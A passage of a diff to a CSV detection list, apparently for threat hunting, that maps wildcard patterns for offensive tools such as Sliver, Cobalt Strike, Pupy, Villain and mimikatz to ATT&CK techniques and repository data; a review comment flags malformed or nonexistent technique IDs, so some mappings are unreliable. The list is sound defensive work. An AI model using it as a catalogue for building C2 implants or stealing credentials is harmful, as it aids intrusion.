Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*genCrossC2 *","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*genCrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*genCrossC2.Win.exe*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - 
T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*generate exe Shadow*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" -"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - 
TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*generate_beacon*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*generate_beanshell1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary 
machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*generate_golden_saml*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*generate_hta operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_jdk8u20*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*generate_mozillarhino1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_mozillarhino2*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - 
T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_powershell operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" 
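Review bot: The sliver rows rewritten in this hunk (`*generate beacon --mtls *`, `*generate --http http*` and the other `generate …` rows) still write sub-techniques as `T1573-001`, `T1059-003`, `T1574-001`, while the other rows use the ATT&CK dot form and the column uses ` - ` as its list separator. A consumer that splits on hyphens or joins this column against ATT&CK IDs will mis-map these detections. The same rows list `T1573-003` to `T1573-005`, and the pupy rows (here and in the `@@ -10553,7` hunk) list `T1071.006` to `T1071.018` and `T1573.003` to `T1573.005`, which as far as I know are not defined ATT&CK sub-techniques. Since the commit already rewrites these lines to refresh the star counts, I would normalise the field at the same time, e.g. `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004`. A CI check that validates every token of `metadata_tool_techniques` against `^T\d{4}(\.\d{3})?$` would catch this in future refreshes.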
@@ -10553,7 +10704,7 @@ "*GenerateDllBase64Hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateExeBase64*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateForcedBrowseWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" -"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Generate-Macro.ps1*","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","665","218","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" "*GenerateParameterWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 
- T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*GenerateReverseTcpDrone*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
@@ -10562,11 +10713,11 @@ "*GenericC2Relay.cs*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*Genetic-Malware/Ebowla*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*genHTA*","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" -"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*gentilkiwi*","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 